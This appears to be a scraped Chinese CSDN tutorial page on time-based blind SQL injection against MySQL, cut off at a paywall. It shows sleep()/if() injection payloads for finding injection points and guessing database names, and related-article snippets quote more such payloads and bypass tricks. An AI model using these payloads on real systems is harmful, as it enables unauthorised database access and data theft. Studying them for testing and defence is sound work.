基于时间差SQL盲注

最新推荐文章于 2024-03-04 14:58:58 发布
最新推荐文章于 2024-03-04 14:58:58 发布
阅读量696 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: 时间盲注 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lingluofengzang/article/details/100054058
版权
本文探讨了时间盲注的概念,介绍了利用sleep()函数进行延迟测试的方法,以及如何通过时间差来探测SQL注入点,进而实现数据库、表、列及字段的爆破。详细阐述了这一过程中的关键步骤和技术要点。
摘要由CSDN通过智能技术生成

  1. 说明

    目标数据库类型: MySQL
数据库:world
表:city
列:ID Name CountryCode District Population

  2. 时间盲注时,涉及的函数

    sleep(s)
	SQL语句暂停执行时间s秒
mid(s,n,len)
	从字符串 s 的 n 位置截取长度为 len 的子字符串
length(s)
	返回字符串 s 的字符数
if(expr,v1,v2)
	如果表达式 expr 成立,返回结果 v1;否则,返回结果 v2。
substr(s,n,len)
	从字符串 s 的 n 位置截取长度为 len 的子字符串
ascii(s)
	返回字符串的第一个字符的 ASCII 码
limit
	强制 SELECT 语句返回指定的记录数
database()
	当前使用的数据库

  3. 注入点

    传递参数中加入sleep(10),看一下页面返回是不是有延时。
    不详细说怎么判断注入点了!

    我这里注入点为id
    正常SQL语句为 SELECT * FROM city WHERE `id`=

  4. 判断注入点

    (select * from(select sleep(12)union/ select 1)a)

爆当前用户、数据库版本,我省掉了

  1. 爆数据库

    猜数据库长度
		(if((length(database())=4),sleep(5),0))
		逻辑:
				如果数据库长度为5,就执行sleep(5)
猜数据库名
		sleep(if((mid(database(),1,1)=
最低0.47元/天 解锁文章
F0ever
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql查询语句select-limit使用详解
jesseyoung
10-20 1万+
1 limit使用简介     limit子句是一个选择语句块的最后一个子句,它选取了行的一个子集,来限定中间结果的输出行数。limit子句表示了最前面和最后面被提取的行数。     通常情况下,Limit关键字可以接受一个或者两个数字参数。需要注意的是,这个参数必须是一个整数常量。如果用户给定两个参数,则第一个参数表示第一个返回记录行的偏移量,第二个参数则表示返回记录行的最大数据。另外需要提
linux nginx 日志位置,mac nginx 日志位置
weixin_42549117的博客
05-02 1228
xsjyBldb • 2021-03-27 07:44''||(select 1 from (select pg_sleep(15))x)||''xsjyBldb • 2021-03-27 07:44'||(select 1 from (select pg_sleep(15))x)||'xsjyBldb • 2021-03-27 07:44'||DBMS_PIPE.RECEIVE_MESSA...
Mysql 被注入语句
Andy ` 勋章的博客
02-19 147
POST提交来的数据:1'and(select*from(select+sleep(4))a/**/union/**/select+1)=': 用于在特殊字符前添加反斜杠,可以用于过滤用户输入的数据,防止SQL注入攻击。
Sql注入系列详解(一)---基于时间差盲注
热门推荐
AI.PLAY
05-07 1万+
Sql 基于时间盲注   基于的原理是,当对数据库进行查询操作,如果查询的条件不存在,语句执行的时间便是0.但往往语句执行的速度非常快,线程信息一闪而过,得到的执行时间基本为0. 例如: 于是sleep(N)这个语句在这种情况下起到了非常大的作用。  Select sleep(N)可以让此语句运行n秒钟。 但是如果查询语句的条件不存在,执行的时间便是0,利用该函数
N13-sqli盲注 基于时间
尐猴子君ii的博客
04-08 271
打开pikachu测试平台,sqli base on time 章节。 先输入一个’ 尝试一下,发现反馈不报错。 输入kobe,发现反馈信息不变 打开浏览器的开发者工具,控制台,选择网络 输入 kobe’ and Sleep(5) #,发现延迟5秒发送。 输入错误信息,发现Sleep语句不执行。 这样我们就可以写一个判断kobe’ and if((substr(database(),1,1...
SQL注入时间盲注
qq_43936524的博客
03-13 6105
文章目录sqlmap日记溯源实例发现时间盲注构造时间盲注payload编写脚本成功跑出数据库名 sqlmap日记溯源 实例 发现时间盲注 一个实用的时间盲注fuzz payload 在一次测试中,发现一个参数存在时间盲注,fuzz的payload为desc,(select*from(select+sleep(2)union/**/select+1)a),其中(select*from(select+sleep(2)union/**/select+1)a))是检测时间盲注时一个很好用的fuzz payload。
SQL注入之基于布尔的盲注详解
09-10
在基于布尔的盲注中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回不同的状态。例如,通过在URL中添加`id=2' and length(database())>1 %23`这样的参数,...
python编写的sql盲注
10-28
python编写的sql盲注
BurpSuite辅助SQL盲注安装教程
最新发布
03-10
BurpSuite辅助SQL盲注安装教程
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
php二维数组根据键值返回,php二维数组根据指定键值重新排序
weixin_30571837的博客
04-09 435
:支持免登录发表评论12020-07-12 10:15:07 回复:支持免登录发表评论2021-03-08 19:53:56 回复:请先登录后回复评论2021-03-08 19:54:12 回复:请先登录后回复评论2021-03-08 19:54:18 回复:支持免登录发表评论2021-03-08 20:04:13 回复:支持免登录发表评论2021-03-08 20:04:14 回复:支持免登录发...
2、Bluecms代码审计
Yzz_的博客
03-04 602
【代码】2、Bluecms代码审计。
CTF 中的 SQL 注入总结
重新启程
10-12 4865
flag 常见表 1 select flag from flag SQL 注入的基本原理 1 2 3 select * from user where username='' and pass='' # 构造 username=devnull' or '1后,sql 语句变成 select * from us...
hive分区对应hadoop_Hadoop之hive中sql常用函数汇总
weixin_39733948的博客
12-23 435
1、hive执行引擎 mr/tez/sparkset hive.execution.engine = mr;2、开启动态分区set hive.exec.dynamic.partition = true;set hive.exec.dynamic.partition.mode = nonstrict;## 删除分区:ALTER TABLE dm.user_action_self_help_w_wi ...
sleepselect函数
崔行兵的专栏
12-10 5358
我在一个进程中,有三个线程,其中有两个线程需要延时自己。 请问可以在这两个线程中均调用sleep函数实现延时功能吗? 其中一个线程在调用sleep的时候会被另一个线程抢占吗? 如果抢占了,那么计时器会不会产生冲突? 另外采用 select(0,NULL,NULL,NULL,&tm); 实现延时的时候,可以多次这样子调用并且和sleep函数一起使用吗? select(0,NUL
特殊的绕过
weixin_45611539的博客
05-16 1729
特殊的绕过 此章会讲一些sql注入的特殊绕过姿势。 此帖实际为笔者的笔记。有些地方是学习了一些大佬的帖子,才写出来的。也算借鉴吧,如果有大佬介意的话,笔者会删除此贴 大佬的绕过技巧 1. 逗号绕过 此题的实例为bugku中web的insert into注入 union的逗号绕过 union的逗号绕过很简单,只需要使用join的方式。就能够绕过逗号 而使用join的方式如下: union select 1,2,3,4; union select * from ((select 1)A join (s
突破sql 注入过滤Union+SELECT 继续射下去
weixin_33755557的博客
01-18 235
http://blog.csdn.net/feier7501/article/details/9748623 转载于:https://www.cnblogs.com/fuchuanfeng/p/6297313.html
SQL注入绕过技巧
weixin_33970449的博客
07-29 1022
1.绕过空格(注释符/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值